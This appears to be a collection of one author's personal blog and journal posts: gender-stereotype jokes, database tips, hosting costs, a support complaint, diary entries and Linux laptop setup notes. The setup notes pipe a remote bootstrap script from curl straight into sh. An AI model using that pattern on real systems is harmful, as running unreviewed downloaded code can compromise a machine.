<p>1. If something we said can be interpreted two ways, and one of the ways</p>
<p>makes you sad or angry, we meant the other one.</p>
<p>1. You can either ask us to do something or tell us how you want it</p>
<p>done. Not both._ If you already know best how to do it, just do it</p>
<p>yourself.</p>
<p>1. Whenever possible, please say whatever you have to say during</p>
<p>commercials.</p>
<p>1. <NAME> did not need directions and neither do we.</p>
<p>1. ALL men see in only 16 colours, like Windows default settings. Peach,</p>
<p>for example, is a fruit, not a colour. Pumpkin is also a fruit. We have</p>
<p>no idea what mauve is.</p>
<p>1. If it itches, it will be scratched. We do that.</p>
<p>1. If we ask what is wrong and you say "nothing," we will act like</p>
<p>nothing's wrong. We know you are lying, but it is just not worth the</p>
<p>hassle.</p>
<p>1. If you ask a question you don't want an answer to, expect an answer</p>
<p>you don't want to hear.</p>
<p>1. When we have to go somewhere, absolutely anything you wear is fine.</p>
<p>Really.</p>
<p>1. Don't ask us what we're thinking about unless you are prepared to</p>
<p>discuss such topics as Sex, Sport, or Cars.</p>
<p>1. You have enough clothes.</p>
<p>1. You have too many shoes.</p>
<p>1. I am in shape. Round is a shape.</p>
<p>1. Thank you for reading this; Yes, I know, I have to sleep on the couch</p>
<p>tonight, but did you know men really don't mind that, it's like camping.</p>
<file_sep>---
layout: post
title: 5 ways to make your database better - by <NAME>
description: Step up your database game with these top tips.
category: blog
---
## [1] Documentation
Shoot me okay, but maintenance of software is [insert large number here] times
the cost of creation, especially with relational databases. You are a pro
working for a client, you owe it to them to make it possible for them to have
future staff (and yourself!) be as effective as possible. You put all that
effort into figuring out why a column should exist and have that name, now
share that knowledge before you move on to the next greenfield project
* [Redgate SqlDoc](https://www.red-gate.com/products/sql-development/sql-doc/)
is great for rapidly adding missing documentation.
* [SchemaSpy](http://schemaspy.org/) generates static html sites making it easy
to see what documentation there is (or isn't!) and share it with the team.
It's free & open source (although a bit fiddly to set up and run). It has
particularly nice clickable diagrams.
* [Dataedo generates static html sites &
pdfs](https://dataedo.com/tutorials/getting-started/generating-database-documentation)
as well, and is commercial and slicker than SchemaSpy
* This [gist for source-controlling ms_description
attributes](https://gist.github.com/timabell/6fbd85431925b5724d2f) gives you
a two-way source-controllable / editable list of your documentation in SQL
Server
* [SQL Schema Explorer](http://schemaexplorer.io/) generates dynamic html sites
making it easy to see what documentation there is and share it with the team.
## [2] Refactor your database
Migrations are a thing now. Use them. You refactor your code, why wouldn't you
refactor your database? Stop leaving landmines for future people - misleading
names, bad structures etc. Use the redgate tools (ready-roll etc), use your
orm’s tools (EF migrations, active record migrations). Yes you have to deal
with data, but it’s the exception not the rule that it’s going to take hours to
run because of data volumes.
* [Redgate's SQL Change
Automation](https://www.red-gate.com/products/sql-development/sql-change-automation/)
(formerly
[ReadyRoll](https://www.red-gate.com/blog/working/from-release-engineer-to-readyroll-founder-and-redgate-product-manager))
is an opinionated tool for creating and running database migrations, it even
generates Database Administrator (DBA) friendly pure-sql deployment packages.
Very impressive!
* [Redgate's SQL Source Control supports
migrations](https://documentation.red-gate.com/soc6/common-tasks/working-with-migration-scripts)
* I've been using [EF Core
migrations](https://docs.microsoft.com/en-us/ef/core/managing-schemas/migrations/)
recently and they work well. There are equivalents for all the major
platforms.
## [3] Enforce data integrity
Does your app fall over if the data is bad? Databases have many powerful ways
of enforcing the rules your code relies on: nullability, foreign keys, [check
constraints](https://www.w3schools.com/SQL/sql_check.asp), unique constraints.
Stop the bad data before it even gets in there. Now that your database is
enforcing these rules, your code doesn't have to handle violations of them when
reading data, because they'll never happen.
## [4] Integration testing
You have an ORM. Great. You have unit tests. Great. But where the rubber hits
the road and your code sends SQL to a real database it breaks at runtime more
often than you’d like to admit because the generated sql didn't jibe with the
real database structure or data in some obscure fashion. Automate the
creation/test/destruction of your db and run full end to end integration tests.
I suggest automating from the layer below the UI to keep the tests fast. There
are many techniques for keeping the tests quick but still realistic: do end to
end smoke tests instead of individual pieces, use an in-memory database, use
[database
snapshots](https://gist.github.com/timabell/3164291#file-create-snapshot-sql)
or the fancy [sql-clone](https://www.red-gate.com/products/dba/sql-clone/index)
tool from Redgate to make creation / rollback virtually instant. Can you pull
realistic (anonymised) data from production? Better still, now you’ll catch a
whole new class of bugs before they hit prod.
* Here's [a guide from Redgate detailing one way to do continuous integration
testing with
databases](https://www.red-gate.com/simple-talk/sql/sql-tools/continuous-integration-for-databases-using-red-gate-tools/)
## [5] Make it visible
Are the only people that can see the database structures the coders and DBAs?
Do the business owners, support people, and Quality Assurance (QA) people find it a
mystery? You should be just as proud of your database as you are of your code,
by shining a light on this dark corner of your digital estate you can make it
as good as it should be, not an embarrassing backwater. By sharing the database
in an accessible form to the non-coders in your team you can help them be more
effective in their jobs.
* The html generated by [SchemaSpy](http://schemaspy.org/) can be shared on any
webserver to let your whole team see your schema structures
* [SQL Schema Explorer](http://schemaexplorer.io/) can be run on your network
or cloud hosting ([schema explorer is
dockerized](https://hub.docker.com/r/timabell/sdv/)!) to give your team easy
access to both the schema and data within the database.
Combine these tools with a continuous integration system and you have easy
access to the bleeding edge of your database's development.
## Take action now!
1. Make a start on at least one of these improvements today.
2. Share this article with your team - get everyone motivated to improve.
3. Share this article on social media - help spread the word that our
databases deserve better!
I hope this has inspired you to make an improvement in the often unloved
underbelly of your applications.
What do you think needs improving in the way we deal with databases? What
change did you make because of this? [Let me
know!](mailto:<EMAIL>?subject=making better databases)
Originally posted at
[http://schemaexplorer.io/blog/2018/07/10/5-ways-to-make-your-database-better.html](http://schemaexplorer.io/blog/2018/07/10/5-ways-to-make-your-database-better.html)
<file_sep>---
title: "M4 J11 Reading plans"
date: 2006-07-07
slashdot_url: https://slashdot.org/journal/139223/m4-j11-reading-plans
---
<p><a href="http://news.bbc.co.uk/1/hi/england/berkshire/5154816.stm">http://news.bbc.co.uk/1/hi/england/berkshire/5154816.stm</a></p>
<p><a href="http://www.pba.co.uk/keyprojects.asp?ID=29">http://www.pba.co.uk/keyprojects.asp?ID=29</a></p>
<p><a href="http://www.reading.gov.uk/Documents/transport_streets/M4J11Map1.pdf">http://www.reading.gov.uk/Documents/transport_streets/M4J11Map1.pdf</a></p>
<p><a href="http://www.reading.gov.uk/Documents/transport_streets/1211MajorSchemes.pdf">http://www.reading.gov.uk/Documents/transport_streets/1211MajorSchemes.pdf</a></p>
<p>(Thanks Liz)</p>
<file_sep>---
title: "Wow. I've never had it so good."
date: 2004-07-11
slashdot_url: https://slashdot.org/journal/77075/wow-ive-never-had-it-so-good
---
<p>Life could not be better.</p>
<p>I haven't been this happy for many years. It really hit me when I was driving home tonight from seeing andy 'n co. I was half way home when I felt this huge wave of happiness course through my veins and I broke into a huge uncontrollable smile. It lasted for ages, and I'm still glowing. (<nobr> </nobr>:^D)</p>
<p>Right now I'm listening to the streets on bbc radio 1, and even though it's one of the saddest most moving songs I've ever heard, nothing could bring me down now. I love that tune.</p>
<p>I started my new job at <a href="http://www.emapsite.com/">emapsite</a> last monday and have been thoroughly enjoying it. The people are great and I'm relishing the challenge of a new beginning. I was even happy to head to London on company business!</p>
<p>Which... was the start of a blinding weekend. Sat finished with me rolling into Twyford station at around half ten this morning (Sunday). I've never missed the last train before but I was way too busy living life to worry about little things like that! Besides it was a good opportunity to see my best mate over in sunny Croydon. Most appreciated, thanks a mil darling, I owe you big time (again!).</p>
<p>I regained a close friend this weekend who I had so carelessly lost. I hope there's no hard feelings and I'm looking forward to making up for lost time. I really appreciated being able to talk so freely, like I haven't for a long time. By the way, I have to give a huge thank you to all of my wonderful friends who have stuck by me through hard times, especially ants, coz, kev, andy, ellie, tom, 'laine, and some of my newer friends who probably won't read this! No regrets. Looking forward to more good times. And congrats to Anna, I wish you all the best.</p>
<p>Woah, that was a bit heavy. On a lighter note, I had a great day today helping to build a cardboard kiddy house with andy and 'lainey, pictures will follow after tuesday. I also managed to just about play the first few bars of new tune on the keyboard. I really think I might get somewhere with this music thing.</p>
<p>In other timmy news, I'm looking forward to a forthcoming triathlon relay race, in a kind of nervous way. I feel really good from all the fitness I've gained in the last nine months.</p>
<p>Time for sleep. Wish me luck for everything this week throws at me, and I wish you happiness where ever and who ever you are. Thanks for reading.</p>
<p>xx</p>
<p>Tim</p>
<file_sep>---
title: "colds. ugh"
date: 2005-11-29
slashdot_url: https://slashdot.org/journal/123212/colds-ugh
---
<p>today I have a cold.<nobr> </nobr>:(</p>
<p>oh, and i did write a journal entry the other day, but my computer died b4 I could post it.</p>
<p>it looks like usage of bebo.com is taking off amongst my friends, which is good.</p>
<p>Plan to see Tom this weekend, looking forward to that.</p>
<file_sep>---
title: Laptop setup notes
description: Clean install to functioning workhorse
layout: post
---
This is mostly for my benefit; YMMV. Used for XPS13 and XPS15. Last run with Linux Mint Cinnamon 20.2 LTS.
Things to go from blank machine to fully functioning work laptop.
## Why not use machine images?
Because when you want to upgrade your OS image you have to do this anyway.
## But this will break!
Indeed, and it does, a continuous labour of love. Ideas welcome!
## OS install
* [Download mint cinnamon x64 torrent](https://linuxmint.com/download.php)
* Burn to USB stick
* [Configure Dell XPS 13 to use AHCI mode](https://askubuntu.com/questions/696413/ubuntu-installer-cant-find-any-disk-on-dell-xps-13-9350/696414#696414)
* Boot to stick with `F12`
* Install mint
* Full disk encryption (LUKS), default whole disk partitioning
* Run updates and reboot `sudo apt update && sudo apt upgrade`
## Hibernate / hybrid sleep (unfinished)
Not working at moment, needs more research.
* Enable hibernate?
* Bigger swap?
### Half-arsed research into hibernate
* <https://superuser.com/questions/1539378/what-size-swap-partition-will-allow-a-mint-19-3-installation-with-64g-ram-to-hib?noredirect=1&lq=1>
* <https://superuser.com/questions/1434301/enabling-hibernate-on-linux-mint-19-1?noredirect=1&lq=1>
* <https://help.ubuntu.com/community/SwapFaq>
* <https://unix.stackexchange.com/questions/568093/enable-hibernation-in-power-management>
* <https://dewaka.com/blog/2021/04/08/linux-mint-hibernate/>
* <https://www.fosslinux.com/45454/enable-hibernate-mode-linux-mint.htm>
* <https://askubuntu.com/questions/12383/how-to-go-automatically-from-suspend-into-hibernate>
* <https://www.reddit.com/r/linuxmint/comments/93ta9u/enable_hibernation_in_linux_mint_19_tara/>
## Packaged software install
* Bootstrap my dotmatrix package list [my bootstrap file](https://github.com/timabell/dotmatrix/blob/master/software/bootstrap.sh) like this (don't laugh/cringe):
```
curl https://raw.githubusercontent.com/timabell/dotmatrix/master/software/bootstrap.sh | sh
```
This installs my [usual package list](https://github.com/timabell/dotmatrix/blob/master/bin/packages.txt)
## Hardware
* Disable nvidia GPU in favour of intel card
```
sudo prime-select intel
```
## zsh
* Switch to z-shell `chsh -s /usr/bin/zsh`
Ref: <https://askubuntu.com/questions/131823/how-to-make-zsh-the-default-shell/131838#131838>
## inotify
* inotify increase for:
* RubyMine
* Guard - <https://github.com/guard/listen/wiki/Increasing-the-amount-of-inotify-watchers>
* Syncthing - <https://docs.syncthing.net/users/faq.html#inotify-limits>
```
echo fs.inotify.max_user_watches=524288 | sudo tee -a /etc/sysctl.conf && sudo sysctl -p
```
## File sync with syncthing
* Run syncthing-gtk from system menu (auto-installs syncthing binary)
* [Configure syncthing](http://localhost:8080/) not to route over internet
(no relay, no public discovery, no NAT traversal)
* [Configure firewall-config](https://firewalld.org/documentation/utilities/firewall-config.html)
to allow syncthing
* Add manual service syncthing
* Allow tcp 22000 and 21027 udp
* Make home network use home zone
* Add syncthing to home zone
* Runtime to permanent

* Remove old install machine name from syncthing network
* Tell new and old devices about each other in syncthing
* watch `~/Documents` etc. magically sync (amazing)
## All the things from dotmatrix
```
cd repo/dotmatrix/
bin/symlinks.sh
bin/install
software/delta.sh
# etc
```
## Link local git config
```
cd ~
ln -s ~/Documents/config/.gitconfig.local
```
## Desktop/system config
* Setup touchpad
* Set mouse and trackpad speed/acceleration to max
* Enable horizontal touchpad scroll

* Setup terminal colours and turn off transparency

* Turn off all the system sounds and turn the volume down to 0%.
* Customize time in task bar to ` 📅 %a %e %b %Y 🕓 %H:%M:%S `.
* Lock screen with `Win+L` - start > keyboard > system > lock screen (Windows user habits).
* Turn on automatic updates in update manager preferences, and automatic obsolete kernel removal.
* Configure nemo file manager to always use list view.
* Add workspace switcher applet to taskbar.
## Firefox
* Sign-in to sync
* Remove firefox tabs (because I use [Tree Style Tabs](https://addons.mozilla.org/en-US/firefox/addon/tree-style-tab/))
* `cd ~/.mozilla/firefox/<profile_id_folder>/`
* `mkdir chrome`
* `echo '#TabsToolbar { visibility: collapse !important; }' >> chrome/userChrome.css`
* about:config > `toolkit.legacyUserProfileCustomizations.stylesheets` > `true`
* restart firefox
Reference: <https://superuser.com/questions/1268732/how-to-hide-tab-bar-tabstrip-in-firefox-57-quantum#1268734>
## Startup list
* Menu > Startup Applications
* Adjust to current tastes
* Add additional startup apps:
* Syncthing GTK
## Non-apt program installations
* Use Applets config to download and add [Pomodoro timer](https://cinnamon-spices.linuxmint.com/applets/view/131) in task bar.
* Install [jetbrains toolbox](https://www.jetbrains.com/toolbox/app/)
* [Install flatpak apps from dotmatrix](https://github.com/timabell/dotmatrix/blob/master/software/flatpaks.sh), sign in to them all
* [Give flatpak access wider home folder access](https://askubuntu.com/questions/1086529/how-to-give-a-flatpak-app-access-to-a-directory/1247345#1247345) (for sending pics) with [flatseal](https://flathub.org/apps/details/com.github.tchx84.Flatseal)
* Install all the other things in [dotmatrix/software](https://github.com/timabell/dotmatrix/tree/master/software)
## SSH
* Generate ssh key `ssh-keygen`
* [Add public key to github](https://github.com/settings/keys)
## Postgres
[Use a docker image](https://hackernoon.com/dont-install-postgres-docker-pull-postgres-bee20e200198)
## XPS firmware updates
```
fwupdmgr get-devices
fwupdmgr get-updates
fwupdmgr update
```
refs:
* <https://fwupd.org/lvfs/docs/users>
## Shutter
* Change default save location to `~/tmp/shutter` (new folder)
* Change filename to `shutter_%Y-%m-%d_%NN`
## Thunderbird
* Restore recent backup (from data sync)
## asdf
* [install asdf version manager](https://asdf-vm.com/#/core-manage-asdf-vm?id=install-asdf-vm) for all the things (ruby, node, golang etc.)
## NodeJs setup
asdf plugin-add nodejs
bash ~/.asdf/plugins/nodejs/bin/import-release-team-keyring
asdf install nodejs 8.16.1
node -v
Keyring because nodejs packages are signed and validated
<https://github.com/asdf-vm/asdf-nodejs#install>
## Ruby
asdf plugin add ruby
cd some-project
asdf install
gem install bundler
## See also
* <https://github.com/thoughtbot/laptop>
<file_sep>---
title: "**No Title**"
date: 2004-06-18
slashdot_url: https://slashdot.org/journal/74860/
---
<p>Just read something Ellen wrote for me years ago whilst going through some of my paper.</p>
<p>Made me think.</p>
<p>I'm really very lonely at the moment.</p>
<p>There's so many things I tried to ignore at the time, I didn't read half the things she gave me at the time because it was all a bit much, now going back is very strange.</p>
<file_sep>---
layout: post
title: Contract developer to entrepreneur - resources
date: 2018-02-16 22:31:38.000000000 +00:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2018/02/16/contract-developer-to-entrepreneur-resources/"
---
I'm not there yet so I'm no authority, but here's some things that I think are fab resources on my journey. They are helping me change my thought patterns and behaviour to make success more likely.
## Books (roughly in order of my journey)
* [The e-myth (revisited)](https://www.goodreads.com/book/show/81948.The_E_Myth_Revisited?ac=1&from_search=true)
* [A better mousetrap - the business of invention](https://www.amazon.co.uk/Better-Mousetrap-business-invention/dp/0951385607)
* [The Art of the Start](https://www.goodreads.com/book/show/22835624-the-art-of-the-start-2-0)
* [Key person of influence](https://www.goodreads.com/book/show/23353984-key-person-of-influence-revised-edition?from_search=true)
* [So good they can't ignore you](https://www.goodreads.com/book/show/15789193-so-good-they-can-t-ignore-you)
More books over on [my goodreads profile](https://www.goodreads.com/user/show/50628592-tim-abell).
Some [more suggestions on the cocoon blog](https://cocoon.life/blog/6-must-read-business-books/)
## Inspiration
* <https://www.softwarebyrob.com/2015/03/26/the-stairstep-approach-to-bootstrapping/>
## Podcasts
1. Bootstrapped Web [[Website](http://bootstrappedweb.com)] [[Feed](http://bootstrappedweb.com/feed/podcast/)]
2. Marketing for Developers [[Website](http://devmarketing.xyz)] [[Feed](https://el2.convertkit-mail.com/c/68udv830zfouw6v3n/opfkhq/aHR0cDovL3NpbXBsZWNhc3QuY29tL3BvZGNhc3RzLzE0NDYvcnNz)]
3. <NAME> Presents [[Website](http://okdork.com/podcast)] [[Feed](http://noahkagan.libsyn.com/rss)]
4. Rogue Startups Podcast [[Website](https://roguestartups.com/)] [[Feed](https://roguestartups.com/feed/podcast)]
5. Startup Chat [[Website](http://wpcurve.com/category/podcast)] [[Feed](http://feeds.feedburner.com/StartupChat)]
6. Startups For the Rest of Us [[Website](http://www.startupsfortherestofus.com)] [[Feed](http://www.startupsfortherestofus.com/feed)]
7. The Art of Product [[Website](http://artofproductpodcast.com/)] [[Feed](http://artofproductpodcast.com/rss)]
8. The Indie Hackers Podcast: How Developers are Bootstrapping, Marketing, and Growing Their Online Businesses [[Website](https://indiehackers.com)] [[Feed](http://feeds.backtracks.fm/feeds/indiehackers/indiehackers/feed.xml)]
9. The Startup Chat with Steli and Hiten [[Website](https://thestartupchat.com)] [[Feed](https://thestartupchat.com/feed/podcast/)]
10. The Tim Ferriss Show [[Website](https://art19.com/shows/tim-ferriss-show)] [[Feed](https://rss.art19.com/tim-ferriss-show)]
11. Tropical MBA - Entrepreneurship, Travel, and Lifestyle [[Website](http://www.tropicalmba.com)] [[Feed](http://www.tropicalmba.com/feed/podcast/)]
12. Zen Founder: Startup. Family. Life. [[Website](https://zenfounder.com)] [[Feed](https://zenfounder.com/feed/podcast/)]
[My feed list](https://www.dropbox.com/sh/hamw2d24w4vk062/AACyN1-AfzYpGIoNMl4d9xjOa?dl=0) exported from AntennaPod
## Products
* [github-pages](https://pages.github.com/) - for hosting landing pages etc
* [logojoy.com](http://logojoy.com) - $65 automated and very good logo generator
* godaddy - for domains
## Education
* [http://tinymarketingwins.com/](http://tinymarketingwins.com/) - learn marketing even before you have anything to sell
* [https://designacademy.io/](https://designacademy.io/) - design for developers
* [https://www.ditchinghourly.com/](https://www.ditchinghourly.com/)
* <http://startupclass.samaltman.com/> - also on youtube & as a podcast:
<https://www.youtube.com/watch?v=CBYhVcO4WgI&list=PL5q_lef6zVkaTY_cT1k7qFNF2TidHCe-1>
## Community
* [Indie Hackers](https://www.indiehackers.com/)
## People
* [<NAME>](https://okdork.com/)
* [<NAME>](http://www.timferriss.com/)
* Courtland (Ind<NAME>ers)
* [<NAME>](https://twitter.com/laurium)
* <NAME> (Ditching Hourly)
<file_sep>---
title: "Swimming"
date: 2004-03-15
slashdot_url: https://slashdot.org/journal/65294/swimming
---
<p>Swim swim swim swim. Glug splutter. Pant pant. Swim swim swim.<br>Ouch.</p>
<p>Curry<nobr> </nobr>:)</p>
<file_sep>---
title: "Swimming"
date: 2003-12-23
slashdot_url: https://slashdot.org/journal/56056/swimming
---
<p>Yay! Personal best.<br>36 lengths in one hour. That's 900 metres.</p>
<file_sep>---
title: "read a book today - without leaving your chair"
date: 2005-11-18
slashdot_url: https://slashdot.org/journal/122411/read-a-book-today---without-leaving-your-chair
---
<p><NAME> is giving his latest book away, for nothing (no beers)!<br><a href="http://www.andrewsmcmeel.com/godsdebris/">http://www.andrewsmcmeel.com/godsdebris/</a></p>
<p>--</p>
<p>I know because he sent me his <a href="http://www.dilbert.com/comics/dilbert/dnrc/html/newsletter62.html">newsletter</a></p>
<file_sep>---
title: Finding a contractor accountants
layout: post
---
Boring but important, having an accountancy firm to make sure the books are HMRC-proof is important.
I don't know why but I've found it hard to pick good ones, and harder than I expected to find, research and choose a firm.
## Things that you need to keep in mind
* Business insurance (professional indemnity etc), often bundled but needs to happen
* Accountancy software - some use their own but that makes moving firms harder, so I'd use something separate. Some accountants bundle the fee.
* Xero - works but not very useable, seems to be built around ye-olde accountancy practices rather than what's easy to use.
* FreeAgent - much more useable, good enough for a contracting business
* Company registration (if you're just starting), some accountants will do it for you, or you can [set a company up yourself](https://www.gov.uk/topic/company-registration-filing/starting-company)
## Things your accountants can/should do for you
* Submit yearly accounts to companies house
* Help you set tax efficient salary
* Make sure your accounts in freeagent are accurate
* Help you understand your P&L (profit and loss)
* Submit your vat returns, and help you make sure it's right
* Personal tax return prep (plus spouse), some charge extra
* Make sure you're claiming the correct expenses, notably home-office allowance
* Check your accounts are in line with current laws and tax laws.
## Additional services
Some also will do:
* Bundled FreeAgent subscription
* Company setup
* Umbrella company stuff
* IR35 assessment/protection
* IPSE membership
* Provide a registered address to use that's not your home, and forward any mail
* Business insurance
* Registered company address
## Contract accountant list & reviews
I've asked around my network and these are the ones I've gathered so far. I've put them in a table, added links to trustpilot reviews and made a note of current (at time of writing) review scores and counts to help decide.
* [Airtable of contract accountants](https://airtable.com/shrRhSa7ZFHt1o6Bx)
<iframe class="airtable-embed" src="https://airtable.com/embed/shr3L59pAzDxaDES4?backgroundColor=cyan&viewControls=on" frameborder="0" onmousewheel="" width="100%" height="533" style="background: transparent; border: 1px solid #ccc;"></iframe>
* [Asking on twitter](https://twitter.com/tim_abell/status/1591194541797040128)
* [Asking on LinkedIn](https://www.linkedin.com/posts/timabell_any-suggestions-for-a-better-accountancy-activity-6851550397241290752-JRBl/)
* [Asking on contractor LinkedIn group](https://www.linkedin.com/feed/update/urn:li:activity:6985724333893591042/)
<file_sep>---
layout: post
title: Tech support at its worst
date: '2008-01-30T18:51:00.001Z'
author: <NAME>
tags:
- mcts
- mcp
- review
- training
- microsoft
modified_time: '2008-06-02T15:06:04.721Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-7104045740264013043
blogger_orig_url: https://timwise.blogspot.com/2008/01/tech-support-at-its-worst.html
---
As you may know, I'm working through a Microsoft e-learning course at the
moment. Having had a [few
problems](http://www.flickr.com/photo_zoom.gne?id=2206580619&size=o) with the
service I've been trying to extract some common sense from their support
services. Having failed to get anything vaguely helpful I thought I'd ask them
about who they were, and I think the following response really sums up the
level of idiocy I have encountered thus far.
When asked a simple direct question about who I was communicating with, the
response is either hilarious or depressing, I'm not sure which. It would seem
that before they can tell me where they are based, they need to know what
operating system I run, what version of flash I have, what my login is etc etc.
Talk about customer disservice. The finishing touch for me is the addition of
upbeat advertising added to a response to an evidently already irritated
customer.
Here are the last two messages for your entertainment (identifiers stripped out):
> -------- Original Message --------
> Subject: Re: MCP Ref: C ###### \ site broken. (########)
> Date: Thu, 24 Jan 2008 16:03:12 +0000
> From: Tim\<<EMAIL>>
> To: <EMAIL>\<<EMAIL>>
>
>
> I have a couple of questions for you:
>
> What company are you directly employed by?
> Where are you based?
>
> Thanks
>
> Tim
The highly considered response:
> -------- Original Message --------
> Subject: MCP Ref: C ##### \ site broken. (#######################)
> Date: Wed, 30 Jan 2008 15:59:21 +0100 (CET)
> From: <EMAIL>\<<EMAIL>>
> To: Tim\<<EMAIL>>
>
>
> Hello Tim,
>
> Thank you for contacting Learning Manager Support.
>
> In order for us to process this request, we need the following
> information from you:
>
> - Step by step screen shots of the entire process including the error
> message
>
> - Your log in Live ID and the Unique ID associated to it.
>
> To obtain your Unique ID, please follow the steps provided:
>
> 1) Visit http://account.live.com
>
> 2) Sign in using your passport account.
>
> 3) After singing in you will see a page with more options. Please click
> on 'Registered information'
>
> 4) At the bottom of this page you will see your Unique ID. It will look
> like this: '000XXXXXXXXXXXXX'
>
> - Detailed description of what the problem/issue is that you are
> experiencing.
>
> - What is the Operating System that you are using?
>
> - What is the Internet Browser and version that you are using?
>
> - What version of Flash and Shockwave are you using?
>
> - Screenshot of the following webpage: https://learning.microsoft.com/Commerce/PurchaseHistory.aspx
>
>
> While some of the above information may not seem applicable to your
> issue, it is important that we must receive them in order to best
> resolve your issue.
>
> Please also note that we unfortunately are not allowed to provide you
> any information about our location.
>
> Looking forward to receiving your reply.
>
> Kind Regards
>
> <NAME>
>
> Microsoft Regional Service Center
> E-Mail: <EMAIL>
> Tel.: 0800-9170758 or 0800 0960137
> Fax: ++49 5 24 11 79 60 77
>
> In order to keep up to date with the MCP/ MCT program your contact
> details need to be correct.
>
> Don´t forget: You can update your contact details yourself in the
> Profile Editor on the MCP/ MCT Secure Site at ...
>
> NOW AVAILABLE: Virtual PC-enabled Labs in Official Microsoft Learning
> Products https://partnering.one.microsoft.com/mct/vpc/default.aspx
>
> Microsoft highly recommends that users with Internet access update their
> Microsoft software to protect against viruses and security
> vulnerabilities. The easiest way to do this is to visit the following
> website: http://www.Microsoft.com/protect
It's worth noting that this is totally consistent with the level of service I
have experienced with Microsoft e-learning. As far as I can fathom, the
e-learning system has been set up on a pile of servers and then been left to
rot whilst paying customers are fobbed off by a nameless and faceless 3rd
party. It may be profitable in the short term, but this kind of behaviour may
well be the cracks in the foundations of Microsoft's empire. I for one am
certainly plotting a course for fairer pastures.
<file_sep>---
layout: post
title: Choosing wordpress hosting for a new idea
date: 2017-10-22 11:32:08.000000000 +01:00
type: post
permalink: "/2017/10/22/choosing-wordpress-hosting-for-a-new-idea/"
---
I need somewhere to keep the marketing site/content for my new [Sql Data Viewer](https://sqldataviewer.com/) product. (Since renamed to [SQL Schema Explorer](https://timabell.github.io/schema-explorer/).
I could use [github pages](https://pages.github.com/) or something similar, but I've found the overhead of needing a dev environment to make any change puts me off getting things done. I've been using wordpress.com for this blog and am pretty happy, especially having a mobile app. I've also heard using wordpress makes it easier to outsource content/design if you have enough success to make that worthwhile.
I don't fancy maintenance, security patching and backup, so the marketing site is currently on **[wordpress.com](https://wordpress.com/)** where I've paid for the "personal" plan at **£3/month** to remove ads and the **£0.92/month** for mapping a domain. Affordable for a contractor running a shot-in-the-dark startup side-project that may never make a penny. Note that you only get their built in analytics, you can't add google analytics, and you can't install plugins on that plan.
* To get google analytics you need "premium" at £7/month
* To be able to add plugins you need "business" at £20/month
This is on top of the **£1.15/month** for domain registration and **£10/month** for a VPS (virtual private server) to run my demo site from, both from the excellent [bytemark](https://www.bytemark.co.uk/) hosting company, who've been fab on support from day one.
Just for completeness: the demo site connects to SQL Azure instances, which are easily within the $40/month included with my MSDN Professional subscription that I use for contracting. Handy.
I've been listening to lots of startup podcasts ([email me](mailto:<EMAIL>?subject=startup-podcasts&body=send-me-your-opml!) if you want the list), and have discovered the mighty [<NAME>](https://justinjackson.ca/) and his excellent [Marketing for Developers](https://devmarketing.xyz/) content - I recommend you buy it if you're a developer thinking of selling a product / service. I'm now working through trying to apply the lessons in the book to my own product. I got to the analytics bit and hit a wall. Wordpress.com (the wordpress hosting site, not the software itself) force you to upgrade to the business plan at **£20.83/month**. Given I don't know how long this is going to take me I'm not keen to start ramping up costs to that extent with no obvious route to a return on the investment.
I've looked at the three recommended in Justin's book (plus more added more recently), and the starting prices are:
* [Siteground](https://www.siteground.co.uk/wordpress-hosting.htm): Startup plan (like it!) **£2.75/month** - looks like this might be a winner then! Oh wait, that's a sign-up discount, it's actually **£6.95/month**. Hrumph.
* [Krystal](https://krystal.uk/wordpress-hosting): Personal **£18/month**
* [WPEngine](https://wpengine.com/plans/): Personal $29/month - about **£22/month**.
* [Pagely](https://pagely.com/plans-pricing/): VPS-1 $499/month - about **£380/month** - ouch! I don't think I'm their target market. I wonder if they repriced, perhaps Justin should drop this one from the book.
And that's where I'm at right now. Maybe I'll just shove a docker wordpress image on the VPS, it's already a docker host. I need to figure out hosting multiple sites on one IP for the demos anyway. But then again, I don't want to be a wordpress sys-admin. Or maybe I'll rethink the static site thing.
<file_sep>---
layout: post
title: xsession sold out
date: '2007-11-04T13:59:00.000Z'
author: <NAME>
tags:
- hosting
modified_time: '2007-11-04T14:03:58.488Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-2194756533997655349
blogger_orig_url: https://timwise.blogspot.com/2007/11/xsession-sold-out.html
---
My web host [xsession](http://xsession.com/) has been bought by [namesco](http://www.names.co.uk/), and promptly put domain renewal prices up from £8 to £17\. Time for a new web host.
<file_sep>---
layout: page
title: Payment successful, thanks!
---
Thanks for buying the GTD Trello template.
## To use the template
1. Go to [the GTD Trello template](https://trello.com/b/4L9ezgRP/gtd/timabell2/recommend)
2. Sign up to trello (or sign in)
3. Click "Create Board from Template"
Happy GTDing! I really hope it brings reduced stress to your life.
## Pay it forward
Please help spread the word by sharing [my GTD page](https://timwise.co.uk/2020/09/15/effective-gtd-with-trello/) with your friends, colleagues and on social media. [Here's a tweet to share](https://twitter.com/intent/tweet?text=I%20just%20bought%20Tim%27s%20GTD%20template.%20%3D%3D%3E%20Read%20this%3A%20%22Effective%20GTD%20with%20Trello%22%20by%20%40tim_abell%20https%3A%2F%2Ftimwise.co.uk%2F2020%2F09%2F15%2Feffective-gtd-with-trello%2F%20).
## Support
Any problems get in touch <<EMAIL>>
<file_sep>---
title: "Offline friends"
date: 2004-10-15
slashdot_url: https://slashdot.org/journal/87059/offline-friends
---
<p>Judging by the<nobr> </nobr>/. friends list it looks like I'm failing to persuade people to live online.</p>
<p>Oh well maybe I'll just move back into the real world. Good effort mr tom, nothing new today though?</p>
<p>Tim</p>
<file_sep>---
title: "Photos"
date: 2004-05-13
slashdot_url: https://slashdot.org/journal/71345/photos
---
<p>A friend just put me on to a rather nifty image hosting service called <a href="http://www.photobucket.com/">Photo bucket</a>.<br>I got a registration to have a look round. You can see what I get up to on <a href="http://img66.photobucket.com/albums/v202/tim_abell/">my album</a> page. The service resizes images for you which is handy for the non technically minded of us.</p>
<p>Not that I need it given that I pay for web space.</p>
<file_sep>---
title: "more stats!"
date: 2004-09-15
slashdot_url: https://slashdot.org/journal/83798/more-stats
---
<p>Result! My site's been up long enough to get uptime stats from netcraft. That makes me happy.<br><a href="http://uptime.netcraft.com/up/graph?site=www.timwise.co.uk">http://uptime.netcraft.com/up/graph?site=www.timwise.co.uk</a><br></lunchbreak></p>
<file_sep>---
